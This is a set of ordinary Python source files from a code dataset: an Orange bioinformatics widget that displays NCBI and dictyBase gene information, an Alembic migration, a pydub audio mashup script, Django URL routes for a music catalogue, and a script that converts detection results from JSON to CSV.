import gene, taxonomy\nfrom .utils import download\n\n\nNAME = \"Gene Info\"\nDESCRIPTION = \"Displays gene information from NCBI and other sources.\"\nICON = \"icons/GeneInfo.svg\"\nPRIORITY = 2010\n\nINPUTS = [(\"Examples\", Orange.data.Table, \"setData\")]\nOUTPUTS = [(\"Selected Examples\", Orange.data.Table)]\n\nREPLACES = [\"_bioinformatics.widgets.OWGeneInfo.OWGeneInfo\"]\n\n\nclass TreeModel(QAbstractItemModel):\n\n def __init__(self, data, header, parent):\n QAbstractItemModel.__init__(self, parent)\n self._data = [[QVariant(s) for s in row] for row in data]\n self._dataDict = {}\n self._header = header\n self._roleData = {Qt.DisplayRole: self._data}\n self._roleData = partial(\n defaultdict,\n partial(defaultdict,\n partial(defaultdict, QVariant)))(self._roleData)\n\n def setColumnLinks(self, column, links):\n font = QFont()\n font.setUnderline(True)\n font = QVariant(font)\n for i, link in enumerate(links):\n self._roleData[LinkRole][i][column] = QVariant(link)\n self._roleData[Qt.FontRole][i][column] = font\n self._roleData[Qt.ForegroundRole][i][column] = \\\n QVariant(QColor(Qt.blue))\n\n def setRoleData(self, role, row, col, data):\n self._roleData[role][row][col] = data\n\n def data(self, index, role=Qt.DisplayRole):\n row, col = index.row(), index.column()\n return self._roleData[role][row][col]\n\n def index(self, row, col, parent=QModelIndex()):\n return self.createIndex(row, col, 0)\n\n def parent(self, index):\n return QModelIndex()\n\n def rowCount(self, index=QModelIndex()):\n if index.isValid():\n return 0\n else:\n return len(self._data)\n\n def columnCount(self, index=QModelIndex()):\n return len(self._header)\n\n def headerData(self, section, orientation, role=Qt.DisplayRole):\n if role == Qt.DisplayRole:\n return QVariant(self._header[section])\n return QVariant()\n\n\nclass LinkFmt(object):\n\n def __init__(self, link_fmt, name):\n self.link_fmt = link_fmt\n self.name = name\n\n def format(self, *args, **kwargs):\n return Link(self.link_fmt.format(*args, **kwargs), **kwargs)\n\n def __repr__(self):\n return \"\"\n\n def __str__(self):\n return self.name\n\n\nclass Link(object):\n\n def __init__(self, link, text=None, **kwargs):\n self.link = link\n self.text = text if text is not None else \"link\"\n self.__dict__.update(kwargs)\n\n\n@lru_cache(maxsize=2)\ndef get_ncbi_info(taxid):\n return gene.NCBIGeneInfo(taxid)\n\n\ndef ncbi_info(taxid, genes, advance=None):\n taxid = gene.NCBIGeneInfo.TAX_MAP.get(taxid, taxid)\n download.ensure_downloaded(\n \"NCBI_geneinfo\",\n \"gene_info.%s.db\" % taxid,\n advance\n )\n info = get_ncbi_info(taxid)\n\n schema_link = LinkFmt(\n \"http://www.ncbi.nlm.nih.gov/sites/entrez?Db=gene&Cmd=ShowDetailView&TermToSearch={gene_id}\",\n name=\"NCBI ID\")\n\n schema = [schema_link, \"Symbol\", \"Locus Tag\", \"Chromosome\",\n \"Description\", \"Synonyms\", \"Nomenclature\"]\n ret = []\n for gene_name in genes:\n gi = info.get_info(gene_name)\n if gi:\n ret.append([schema_link.format(gene_id=gi.gene_id, text=gi.gene_id),\n gi.symbol + \" (%s)\" % gene_name if gene_name != gi.symbol else gi.symbol,\n gi.locus_tag or \"\",\n gi.chromosome or \"\",\n gi.description or \"\",\n \", \".join(gi.synonyms),\n gi.symbol_from_nomenclature_authority or \"\"\n ])\n else:\n ret.append(None)\n return schema, ret\n\n\ndef dicty_info(taxid, genes, advance=None):\n from .. 
import dicty\n download.ensure_downloaded(\n dicty.DictyBase.domain,\n dicty.DictyBase.filename,\n advance\n )\n info = dicty.DictyBase()\n name_matcher = gene.GMDicty()\n name_matcher.set_targets(info.info.keys())\n schema_link = LinkFmt(\n \"http://dictybase.org/db/cgi-bin/gene_page.pl?dictybaseid={gene_id}\",\n name=\"Dicty Base Id\")\n schema = [schema_link, \"Name\", \"Synonyms\", \"Gene Products\"]\n\n ret = []\n for gene_name in genes:\n gene_name = name_matcher.umatch(gene_name)\n gi = info.info.get(gene_name, None)\n if gi:\n ret.append([schema_link.format(gene_id=gene_name, text=gene_name),\n gi[0] + \" (%s)\" % gene_name if gene_name != gi[0] else gi[0], # Gene Name\n \", \".join(gi[1]), # Synonyms\n gi[2] or \"\", # Gene Products\n ])\n\n else:\n ret.append(None)\n\n return schema, ret\n\n\nINFO_SOURCES = {\n \"default\": [(\"NCBI Info\", ncbi_info)],\n \"352472\": [(\"NCBI Info\", ncbi_info),\n (\"Dicty Base\", dicty_info)]\n}\n\n\nclass OWGeneInfo(OWWidget):\n settingsList = [\"organismIndex\", \"geneAttr\", \"useAttr\", \"autoCommit\",\n \"taxid\"]\n contextHandlers = {\n \"\": DomainContextHandler(\n \"\", [\"organismIndex\", \"geneAttr\", \"useAttr\", \"useAltSource\",\n \"taxid\"]\n )\n }\n\n def __init__(self, parent=None, signalManager=None, name=\"Gene Info\"):\n OWWidget.__init__(self, parent, signalManager, name)\n\n self.inputs = [(\"Examples\", Orange.data.Table, self.setData)]\n self.outputs = [(\"Selected Examples\", Orange.data.Table)]\n\n self.organismIndex = 0\n self.taxid = None\n self.geneAttr = 0\n self.useAttr = False\n self.autoCommit = False\n self.searchString = \"\"\n self.selectionChangedFlag = False\n self.useAltSource = 0\n self.loadSettings()\n\n self.__initialized = False\n self.initfuture = None\n self.itemsfuture = None\n\n self.infoLabel = OWGUI.widgetLabel(\n OWGUI.widgetBox(self.controlArea, \"Info\", addSpace=True),\n \"Initializing\\n\"\n )\n\n self.organisms = None\n self.organismBox = OWGUI.widgetBox(\n self.controlArea, \"Organism\", addSpace=True)\n\n self.organismComboBox = OWGUI.comboBox(\n self.organismBox, self, \"organismIndex\",\n callback=self._onSelectedOrganismChanged,\n debuggingEnabled=0)\n\n # For now only support one alt source, with a checkbox\n # In the future this can be extended to multiple selections\n self.altSourceCheck = OWGUI.checkBox(self.organismBox, self,\n \"useAltSource\", \"Show information from dictyBase\",\n callback=self.onAltSourceChange,\n# debuggingEnabled=0,\n )\n self.altSourceCheck.hide()\n\n box = OWGUI.widgetBox(self.controlArea, \"Gene names\", addSpace=True)\n self.geneAttrComboBox = OWGUI.comboBox(\n box, self, \"geneAttr\",\n \"Gene atttibute\", callback=self.updateInfoItems\n )\n OWGUI.checkBox(box, self, \"useAttr\", \"Use attribute names\",\n callback=self.updateInfoItems,\n disables=[(-1, self.geneAttrComboBox)])\n\n self.geneAttrComboBox.setDisabled(bool(self.useAttr))\n\n box = OWGUI.widgetBox(self.controlArea, \"Commit\", addSpace=True)\n b = OWGUI.button(box, self, \"Commit\", callback=self.commit)\n c = OWGUI.checkBox(box, self, \"autoCommit\", \"Commit on change\")\n OWGUI.setStopper(self, b, c, \"selectionChangedFlag\",\n callback=self.commit)\n\n # A label for dictyExpress link\n self.dictyExpressBox = OWGUI.widgetBox(\n self.controlArea, \"Dicty Express\")\n self.linkLabel = OWGUI.widgetLabel(self.dictyExpressBox, \"\")\n self.linkLabel.setOpenExternalLinks(False)\n self.connect(self.linkLabel, SIGNAL(\"linkActivated(QString)\"),\n self.onDictyExpressLink)\n 
self.dictyExpressBox.hide()\n\n OWGUI.rubber(self.controlArea)\n\n OWGUI.lineEdit(self.mainArea, self, \"searchString\", \"Filter\",\n callbackOnType=True, callback=self.searchUpdate)\n\n self.treeWidget = QTreeView(self.mainArea)\n self.treeWidget.setRootIsDecorated(False)\n self.treeWidget.setSelectionMode(\n QAbstractItemView.ExtendedSelection)\n self.treeWidget.setItemDelegate(\n LinkStyledItemDelegate(self.treeWidget))\n self.treeWidget.setUniformRowHeights(True)\n self.treeWidget.viewport().setMouseTracking(True)\n self.treeWidget.setSortingEnabled(True)\n self.mainArea.layout().addWidget(self.treeWidget)\n\n box = OWGUI.widgetBox(self.mainArea, \"\",\n orientation=\"horizontal\")\n OWGUI.button(box, self, \"Select Filtered\",\n callback=self.selectFiltered)\n OWGUI.button(box, self, \"Clear Selection\",\n callback=self.treeWidget.clearSelection)\n\n self.resize(1000, 700)\n\n self.geneinfo = []\n self.cells = []\n self.row2geneinfo = {}\n self.data = None\n\n # : (# input genes, # matches genes)\n self.matchedInfo = 0, 0\n self.selectionUpdateInProgress = False\n\n self.setBlocking(True)\n self.executor = ThreadExecutor(self)\n\n self.progressBarInit()\n\n task = Task(\n function=partial(\n taxonomy.ensure_downloaded,\n callback=methodinvoke(self, \"advance\", ())\n )\n )\n\n task.resultReady.connect(self.initialize)\n task.exceptionReady.connect(self._onInitializeError)\n\n self.initfuture = self.executor.submit(task)\n\n @Slot()\n def advance(self):\n assert self.thread() is QThread.currentThread()\n\n self.progressBarSet(self.progressBarValue + 1,\n processEventsFlags=None)\n\n def initialize(self):\n if self.__initialized:\n # Already initialized\n return\n\n self.progressBarFinished()\n\n self.organisms = sorted(\n set([name.split(\".\")[-2] for name in\n serverfiles.listfiles(\"NCBI_geneinfo\")] +\n gene.NCBIGeneInfo.essential_taxids())\n )\n\n self.organismComboBox.addItems(\n [taxonomy.name(tax_id) for tax_id in self.organisms]\n )\n if self.taxid in self.organisms:\n self.organismIndex = self.organisms.index(self.taxid)\n\n self.infoLabel.setText(\"No data on input\\n\")\n self.__initialized = True\n self.initfuture = None\n\n self.setBlocking(False)\n\n def _onInitializeError(self, exc):\n sys.excepthook(type(exc), exc.args, None)\n self.error(0, \"Could not download the necessary files.\")\n\n def _onSelectedOrganismChanged(self):\n self.taxid = self.organisms[self.organismIndex]\n if self.data is not None:\n self.updateInfoItems()\n\n def setData(self, data=None):\n if not self.__initialized:\n self.initfuture.result()\n self.initialize()\n\n if self.itemsfuture is not None:\n raise Exception(\"Already processing\")\n\n self.closeContext()\n self.data = data\n\n if data:\n self.geneAttrComboBox.clear()\n self.attributes = \\\n [attr for attr in (data.domain.variables +\n data.domain.getmetas().values())\n if isinstance(attr, (Orange.feature.String,\n Orange.feature.Discrete))]\n\n self.geneAttrComboBox.addItems(\n [attr.name for attr in self.attributes]\n )\n\n self.taxid = data_hints.get_hint(self.data, \"taxid\", self.taxid)\n self.useAttr = data_hints.get_hint(\n self.data, \"genesinrows\", self.useAttr)\n\n self.openContext(\"\", data)\n self.geneAttr = min(self.geneAttr, len(self.attributes) - 1)\n\n if self.taxid in self.organisms:\n self.organismIndex = self.organisms.index(self.taxid)\n\n self.updateInfoItems()\n else:\n self.clear()\n\n def infoSource(self):\n \"\"\" Return the current selected info source getter function from\n INFO_SOURCES\n \"\"\"\n org = 
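# --- editorial note (not part of the original widget) ---
# The pattern above -- submit a Task to a ThreadExecutor, marshal progress
# back to the GUI thread via methodinvoke(self, "advance", ()), and keep the
# Future so onDeleteWidget() can cancel it -- is Orange's Qt-era recipe for
# background work. A standard-library sketch of the same shape (hypothetical
# names, no Qt):
from concurrent.futures import ThreadPoolExecutor

class BackgroundWorker:
    def __init__(self):
        self._executor = ThreadPoolExecutor(max_workers=1)
        self._future = None

    def submit(self, fn, *args, on_done=None):
        self._future = self._executor.submit(fn, *args)
        if on_done is not None:
            # NB: done-callbacks run in the worker thread, not the GUI thread.
            self._future.add_done_callback(on_done)
        return self._future

    def shutdown(self):
        if self._future is not None:
            self._future.cancel()
        self._executor.shutdown()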
self.organisms[min(self.organismIndex, len(self.organisms) - 1)]\n if org not in INFO_SOURCES:\n org = \"default\"\n sources = INFO_SOURCES[org]\n name, func = sources[min(self.useAltSource, len(sources) - 1)]\n return name, func\n\n def inputGenes(self):\n if self.useAttr:\n genes = [attr.name for attr in self.data.domain.attributes]\n elif self.attributes:\n attr = self.attributes[self.geneAttr]\n genes = [str(ex[attr]) for ex in self.data\n if not ex[attr].isSpecial()]\n else:\n genes = []\n return genes\n\n def updateInfoItems(self):\n self.warning(0)\n if not self.data:\n return\n\n genes = self.inputGenes()\n if self.useAttr:\n genes = [attr.name for attr in self.data.domain.attributes]\n elif self.attributes:\n attr = self.attributes[self.geneAttr]\n genes = [str(ex[attr]) for ex in self.data\n if not ex[attr].isSpecial()]\n else:\n genes = []\n if not genes:\n self.warning(0, \"Could not extract genes from input dataset.\")\n\n self.warning(1)\n org = self.organisms[min(self.organismIndex, len(self.organisms) - 1)]\n source_name, info_getter = self.infoSource()\n\n self.error(0)\n\n self.updateDictyExpressLink(genes, show=org == \"352472\")\n self.altSourceCheck.setVisible(org == \"352472\")\n\n self.progressBarInit()\n self.setBlocking(True)\n self.setEnabled(False)\n self.infoLabel.setText(\"Retrieving info records.\\n\")\n\n self.genes = genes\n\n task = Task(\n function=partial(\n info_getter, org, genes,\n advance=methodinvoke(self, \"advance\", ()))\n )\n self.itemsfuture = self.executor.submit(task)\n task.finished.connect(self._onItemsCompleted)\n\n def _onItemsCompleted(self):\n self.setBlocking(False)\n self.progressBarFinished()\n self.setEnabled(True)\n\n try:\n schema, geneinfo = self.itemsfuture.result()\n finally:\n self.itemsfuture = None\n\n self.geneinfo = geneinfo = list(zip(self.genes, geneinfo))\n self.cells = cells = []\n self.row2geneinfo = {}\n links = []\n for i, (_, gi) in enumerate(geneinfo):\n if gi:\n row = []\n for _, item in zip(schema, gi):\n if isinstance(item, Link):\n # TODO: This should be handled by delegates\n row.append(item.text)\n links.append(item.link)\n else:\n row.append(item)\n cells.append(row)\n self.row2geneinfo[len(cells) - 1] = i\n\n model = TreeModel(cells, [str(col) for col in schema], None)\n\n model.setColumnLinks(0, links)\n proxyModel = QSortFilterProxyModel(self)\n proxyModel.setSourceModel(model)\n self.treeWidget.setModel(proxyModel)\n self.connect(self.treeWidget.selectionModel(),\n SIGNAL(\"selectionChanged(QItemSelection , QItemSelection )\"),\n self.commitIf)\n\n for i in range(7):\n self.treeWidget.resizeColumnToContents(i)\n self.treeWidget.setColumnWidth(\n i, min(self.treeWidget.columnWidth(i), 200)\n )\n\n self.infoLabel.setText(\"%i genes\\n%i matched NCBI's IDs\" %\n (len(self.genes), len(cells)))\n self.matchedInfo = len(self.genes), len(cells)\n\n def clear(self):\n self.infoLabel.setText(\"No data on input\\n\")\n self.treeWidget.setModel(\n TreeModel([], [\"NCBI ID\", \"Symbol\", \"Locus Tag\",\n \"Chromosome\", \"Description\", \"Synonyms\",\n \"Nomenclature\"], self.treeWidget))\n\n self.geneAttrComboBox.clear()\n self.send(\"Selected Examples\", None)\n\n def commitIf(self, *args):\n if self.autoCommit and not self.selectionUpdateInProgress:\n self.commit()\n else:\n self.selectionChangedFlag = True\n\n def commit(self):\n if not self.data:\n return\n model = self.treeWidget.model()\n mapToSource = model.mapToSource\n selectedRows = self.treeWidget.selectedIndexes()\n selectedRows = 
[mapToSource(index).row() for index in selectedRows]\n model = model.sourceModel()\n\n selectedGeneids = [self.row2geneinfo[row] for row in selectedRows]\n selectedIds = [self.geneinfo[i][0] for i in selectedGeneids]\n selectedIds = set(selectedIds)\n gene2row = dict((self.geneinfo[self.row2geneinfo[row]][0], row)\n for row in selectedRows)\n\n if self.useAttr:\n def is_selected(attr):\n return attr.name in selectedIds\n attrs = [attr for attr in self.data.domain.attributes\n if is_selected(attr)]\n domain = Orange.data.Domain(attrs, self.data.domain.classVar)\n domain.addmetas(self.data.domain.getmetas())\n newdata = Orange.data.Table(domain, self.data)\n self.send(\"Selected Examples\", newdata)\n elif self.attributes:\n attr = self.attributes[self.geneAttr]\n examples = [ex for ex in self.data if str(ex[attr]) in selectedIds]\n # Add gene info\n domain = Orange.data.Domain(\n self.data.domain, self.data.domain.classVar)\n domain.addmetas(self.data.domain.getmetas())\n n_columns = model.columnCount()\n\n headers = [str(model.headerData(i, Qt.Horizontal, Qt.DisplayRole)\n .toString())\n for i in range(n_columns)]\n new_meta_attrs = [(Orange.feature.Descriptor.new_meta_id(),\n Orange.feature.String(name))\n for name in headers]\n domain.addmetas(dict(new_meta_attrs))\n examples = [Orange.data.Instance(domain, ex) for ex in examples]\n for ex in examples:\n for i, (_, meta) in enumerate(new_meta_attrs):\n index = model.index(gene2row[str(ex[attr])], i)\n ex[meta] = str(\n model.data(index, Qt.DisplayRole).toString()\n )\n\n if examples:\n newdata = Orange.data.Table(examples)\n else:\n newdata = None\n self.send(\"Selected Examples\", newdata)\n else:\n self.send(\"Selected Examples\", None)\n\n def rowFiltered(self, row):\n searchStrings = self.searchString.lower().split()\n row = unicode(\" \".join(self.cells[row]).lower(), errors=\"ignore\")\n return not all([s in row for s in searchStrings])\n\n def searchUpdate(self):\n if not self.data:\n return\n searchStrings = self.searchString.lower().split()\n index = self.treeWidget.model().sourceModel().index\n mapFromSource = self.treeWidget.model().mapFromSource\n for i, row in enumerate(self.cells):\n row = unicode(\" \".join(row).lower(), errors=\"ignore\")\n self.treeWidget.setRowHidden(\n mapFromSource(index(i, 0)).row(),\n QModelIndex(),\n not all([s in row for s in searchStrings]))\n\n def selectFiltered(self):\n if not self.data:\n return\n itemSelection = QItemSelection()\n\n index = self.treeWidget.model().sourceModel().index\n mapFromSource = self.treeWidget.model().mapFromSource\n for i, row in enumerate(self.cells):\n if not self.rowFiltered(i):\n itemSelection.select(mapFromSource(index(i, 0)),\n mapFromSource(index(i, 0)))\n self.treeWidget.selectionModel().select(\n itemSelection,\n QItemSelectionModel.Select | QItemSelectionModel.Rows)\n\n def sendReport(self):\n from Orange.OrangeWidgets import OWReport\n genes, matched = self.matchedInfo\n\n if self.organisms:\n org = self.organisms[min(self.organismIndex,\n len(self.organisms) - 1)]\n org_name = taxonomy.name(org)\n else:\n org = None\n org_name = None\n if self.data is not None:\n self.reportRaw(\n \"

<p>Input: %i genes of which %i (%.1f%%) matched NCBI synonyms\"\n                \"<br>\"\n                \"Organism: %s\"\n                \"<br>\"\n                \"Filter: %s\"\n                \"</p>\" % (genes, matched, 100.0 * matched / genes, org_name,\n                     self.searchString)\n            )\n            self.reportSubsection(\"Gene list\")\n            self.reportRaw(reportItemView(self.treeWidget))\n        else:\n            self.reportRaw(\"<p>No input</p>
    \")\n\n def updateDictyExpressLink(self, genes, show=False):\n def fix(ddb):\n if ddb.startswith(\"DDB\"):\n if not ddb.startswith(\"DDB_G\"):\n ddb = ddb.replace(\"DDB\", \"DDB_G\")\n return ddb\n return None\n if show:\n genes = [fix(gene) for gene in genes if fix(gene)]\n link1 = 'Microarray profile'\n link2 = 'RNA-Seq profile'\n self.linkLabel.setText(link1 + \"
    \" + link2)\n\n show = any(genes)\n\n if show:\n self.dictyExpressBox.show()\n else:\n self.dictyExpressBox.hide()\n\n def onDictyExpressLink(self, link):\n if not self.data:\n return\n\n selectedIndexes = self.treeWidget.selectedIndexes()\n if not len(selectedIndexes):\n QMessageBox.information(\n self, \"No gene ids selected\",\n \"Please select some genes and try again.\"\n )\n return\n model = self.treeWidget.model()\n mapToSource = model.mapToSource\n selectedRows = self.treeWidget.selectedIndexes()\n selectedRows = [mapToSource(index).row() for index in selectedRows]\n model = model.sourceModel()\n\n selectedGeneids = [self.row2geneinfo[row] for row in selectedRows]\n selectedIds = [self.geneinfo[i][0] for i in selectedGeneids]\n selectedIds = set(selectedIds)\n\n def fix(ddb):\n if ddb.startswith(\"DDB\"):\n if not ddb.startswith(\"DDB_G\"):\n ddb = ddb.replace(\"DDB\", \"DDB_G\")\n return ddb\n return None\n\n genes = [fix(gene) for gene in selectedIds if fix(gene)]\n url = str(link) % \" \".join(genes)\n QDesktopServices.openUrl(QUrl(url))\n\n def onAltSourceChange(self):\n self.updateInfoItems()\n\n def onDeleteWidget(self):\n OWWidget.onDeleteWidget(self)\n\n # try to cancel pending tasks\n if self.initfuture:\n self.initfuture.cancel()\n if self.itemsfuture:\n self.itemsfuture.cancel()\n\n self.executor.shutdown()\n\n\ndef reportItemView(view):\n model = view.model()\n return reportItemModel(view, model)\n\n\ndef reportItemModel(view, model, index=QModelIndex()):\n if not index.isValid() or model.hasChildren(index):\n columnCount, rowCount = model.columnCount(index), model.rowCount(index)\n if not index.isValid():\n text = ('\\n' +\n ''.join('' %\n model.headerData(i, Qt.Horizontal, Qt.DisplayRole)\n .toString()\n for i in range(columnCount)) +\n '\\n')\n else:\n pass\n text += ''.join('' +\n ''.join('' for column in range(columnCount)) +\n '\\n'\n for row in range(rowCount)\n if not view.isRowHidden(row, index))\n text += '
    %s
    ' + reportItemModel(view, model, model.index(row, column, index)) +\n '
    '\n return text\n else:\n variant = model.data(index, Qt.DisplayRole)\n return str(variant.toString()) if variant.isValid() else \"\"\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n data = Orange.data.Table(\"brown-selected.tab\")\n w = OWGeneInfo()\n w.show()\n\n w.setData(data)\n app.exec_()\n w.saveSettings()\n","repo_name":"biolab/orange-bio","sub_path":"orangecontrib/bio/widgets/OWGeneInfo.py","file_name":"OWGeneInfo.py","file_ext":"py","file_size_in_byte":25907,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"51"} +{"seq_id":"32539559293","text":"\"\"\"pic id added to weather report table\n\nRevision ID: 127a2b9080b1\nRevises: f4a49fd05e68\nCreate Date: 2020-09-30 01:27:42.597890\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '127a2b9080b1'\ndown_revision = 'f4a49fd05e68'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('good_morning_report', sa.Column('pic_id', sa.String(length=10), nullable=True))\n op.execute(\"UPDATE good_morning_report SET pic_id = '10d'\")\n op.alter_column('good_morning_report', 'pic_id', nullable=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('good_morning_report', 'pic_id')\n # ### end Alembic commands ###\n","repo_name":"AlecJ/rpgmanager","sub_path":"migrations/versions/127a2b9080b1_pic_id_added_to_weather_report_table.py","file_name":"127a2b9080b1_pic_id_added_to_weather_report_table.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"30325544150","text":"# Playing with Music\nfrom glob import glob\nfrom pydub import AudioSegment\n\nplaylist_songs = [AudioSegment.from_mp3(mp3_file) for mp3_file in glob(\"*.mp3\")]\n# print(playlist_songs)\n# first_song = playlist_songs.pop(0)\n# first_song = first_song[:5000] # milliseconds to seconds\n# second_song = playlist_songs.pop(0)\n# second_song = second_song[31000:41000] # milliseconds to seconds\n# playlist = first_song + second_song\n# playlist_length = len(playlist) / (1000 * 60)\n# # lets save it!\n# out_f = open(\"playlist.mp3\", 'wb')\n#\n# playlist.export(out_f, format='mp3')\n\nsong = playlist_songs.pop(1)\nten_seconds = 10 * 1000\nfirst_10_seconds = song[:ten_seconds]\nlast_5_seconds = song[-5000:]\nbeginning = first_10_seconds + 6\nend = last_5_seconds - 3\nwithout_the_middle = beginning + end\nwith_style = beginning.append(end, crossfade=1500)\ndo_it_over = with_style * 2\nawesome = do_it_over.fade_in(2000).fade_out(3000)\nawesome.export(\"mashup.mp3\", format=\"mp3\")\n","repo_name":"CleverProgrammer/python-programs","sub_path":"python_music/music_playground.py","file_name":"music_playground.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"7890640135","text":"from django.urls import include, path\n\nfrom .views import *\n\ntrack_urlpatterns = [\n path('.list', TrackListView.as_view(), name='track-list'),\n path('.update//', TrackUpdateView.as_view(), name='track-update'),\n path('.delete//', TrackDestroyView.as_view(), name='track-destroy'),\n path('.details//', TrackDetailsView.as_view(), name='track-details'),\n]\n\nartist_urlpatterns = [\n path('.list', 
{"seq_id":"7890640135","text":"from django.urls import include, path\n\nfrom .views import *\n\ntrack_urlpatterns = [\n    path('.list', TrackListView.as_view(), name='track-list'),\n    path('.update/<int:pk>/', TrackUpdateView.as_view(), name='track-update'),\n    path('.delete/<int:pk>/', TrackDestroyView.as_view(), name='track-destroy'),\n    path('.details/<int:pk>/', TrackDetailsView.as_view(), name='track-details'),\n]\n\nartist_urlpatterns = [\n    path('.list', ArtistListView.as_view(), name='artist-list'),\n    path('.update/<int:pk>/', ArtistUpdateView.as_view(), name='artist-update'),\n    path('.delete/<int:pk>/', ArtistDestroyView.as_view(), name='artist-destroy'),\n    path('.details/<int:pk>/', ArtistDetailsView.as_view(), name='artist-details'),\n]\n\nalbum_urlpatterns = [\n    path('.list', AlbumListView.as_view(), name='album-list'),\n    path('.update/<int:pk>/', AlbumUpdateView.as_view(), name='album-update'),\n    path('.delete/<int:pk>/', AlbumDestroyView.as_view(), name='album-destroy'),\n    path('.details/<int:pk>/', AlbumDetailsView.as_view(), name='album-details'),\n]\n\ncustomer_urlpatterns = [\n    path('.list', CustomerListView.as_view(), name='customer-list'),\n    path('.update/<int:pk>/', CustomerUpdateView.as_view(), name='customer-update'),\n    path('.delete/<int:pk>/', CustomerDestroyView.as_view(), name='customer-destroy'),\n    path('.details/<int:pk>/', CustomerDetailsView.as_view(), name='customer-details'),\n]\n\nemployee_urlpatterns = [\n    path('.list', EmployeeListView.as_view(), name='employee-list'),\n    path('.update/<int:pk>/', EmployeeUpdateView.as_view(), name='employee-update'),\n    path('.delete/<int:pk>/', EmployeeDestroyView.as_view(), name='employee-destroy'),\n    path('.details/<int:pk>/', EmployeeDetailsView.as_view(), name='employee-details'),\n]\n\ngenre_urlpatterns = [\n    path('.list', GenreListView.as_view(), name='genre-list'),\n    path('.update/<int:pk>/', GenreUpdateView.as_view(), name='genre-update'),\n    path('.delete/<int:pk>/', GenreDestroyView.as_view(), name='genre-destroy'),\n    path('.details/<int:pk>/', GenreDetailsView.as_view(), name='genre-details'),\n]\n\ninvoice_urlpatterns = [\n    path('.list', InvoiceListView.as_view(), name='invoice-list'),\n    path('.update/<int:pk>/', InvoiceUpdateView.as_view(), name='invoice-update'),\n    path('.delete/<int:pk>/', InvoiceDestroyView.as_view(), name='invoice-destroy'),\n    path('.details/<int:pk>/', InvoiceDetailsView.as_view(), name='invoice-details'),\n]\n\nmedia_type_urlpatterns = [\n    path('.list', MediaTypeListView.as_view(), name='media_type-list'),\n    path('.update/<int:pk>/', MediaTypeUpdateView.as_view(), name='media_type-update'),\n    path('.delete/<int:pk>/', MediaTypeDestroyView.as_view(), name='media_type-destroy'),\n    path('.details/<int:pk>/', MediaTypeDetailsView.as_view(), name='media_type-details'),\n]\n\nplaylist_urlpatterns = [\n    path('.list', PlaylistListView.as_view(), name='playlist-list'),\n    path('.update/<int:pk>/', PlaylistUpdateView.as_view(), name='playlist-update'),\n    path('.delete/<int:pk>/', PlaylistDestroyView.as_view(), name='playlist-destroy'),\n    path('.details/<int:pk>/', PlaylistDetailsView.as_view(), name='playlist-details'),\n]\n\ninvoice_item_urlpatterns = [\n    path('.list', InvoiceItemListView.as_view(), name='invoice_item-list'),\n    path('.update/<int:pk>/', InvoiceItemUpdateView.as_view(), name='invoice_item-update'),\n    path('.delete/<int:pk>/', InvoiceItemDestroyView.as_view(), name='invoice_item-destroy'),\n    path('.details/<int:pk>/', InvoiceItemDetailsView.as_view(), name='invoice_item-details'),\n]\n\nurlpatterns = [\n    path(\"track\", include(track_urlpatterns)),\n    path(\"artist\", include(artist_urlpatterns)),\n    path(\"album\", include(album_urlpatterns)),\n    path(\"customer\", include(customer_urlpatterns)),\n    path(\"employee\", include(employee_urlpatterns)),\n    path(\"genre\", include(genre_urlpatterns)),\n    path(\"invoice\", include(invoice_urlpatterns)),\n    path(\"invoice_item\", include(invoice_item_urlpatterns)),\n    path(\"media_type\", include(media_type_urlpatterns)),\n    path(\"playlist\", include(playlist_urlpatterns)),\n]\n","repo_name":"DivyamaniArya/django_music_directory","sub_path":"chinook/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"23436475625","text":"import csv\n\nresult_json= [\n\"\"\"\n# paste the result.json here\n# demo:\n\n{\n \"frame_id\":1, \n \"filename\":\"data/test/2010111918.jpg\", \n \"objects\": [ \n\n ] \n}, \n...\n\"\"\"\n]\n\ndef main(result_json):\n    with open('results_v1.csv', 'w', newline='') as csvfile:\n        \n        fieldnames = ['image_filename', 'label_id', 'x', 'y', 'w', 'h', 'confidence']\n        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n        writer.writeheader()\n        \n        for ele in result_json:\n            \n            filename = get_filename(ele[\"filename\"])\n            \n            if ele[\"objects\"] != []:\n                for bbox in ele[\"objects\"]:\n                    label_id, x, y, w, h, confidence = get_bbox_info(bbox)\n                    \n                    print(filename, label_id + 1, x, y, w, h, confidence)\n                    writer.writerow({'image_filename': filename, 'label_id': label_id + 1, 'x': x, 'y': y, 'w': w, 'h': h, 'confidence': confidence})\n\ndef get_filename(file_path):\n    filenames = file_path.split(\"/\")\n    filename = filenames[-1]\n    return filename\n\ndef get_bbox_info(obj):\n    label_id = obj[\"class_id\"]\n    cx = obj[\"relative_coordinates\"][\"center_x\"]\n    cy = obj[\"relative_coordinates\"][\"center_y\"]\n    w = obj[\"relative_coordinates\"][\"width\"]\n    h = obj[\"relative_coordinates\"][\"height\"]\n    confidence = obj[\"confidence\"]\n    \n    cx = cx * 400\n    cy = cy * 300\n    w = w * 400\n    h = h * 300\n    \n    x = cx - w/2\n    y = cy - h/2\n    \n    x = round(x)\n    y = round(y)\n    w = round(w)\n    h = round(h)\n    \n    return label_id, x, y, w, h, confidence\n\nmain(result_json)","repo_name":"Ratherman/AI","sub_path":"DeepLearning/HW6/parse_json_to_csv.py","file_name":"parse_json_to_csv.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
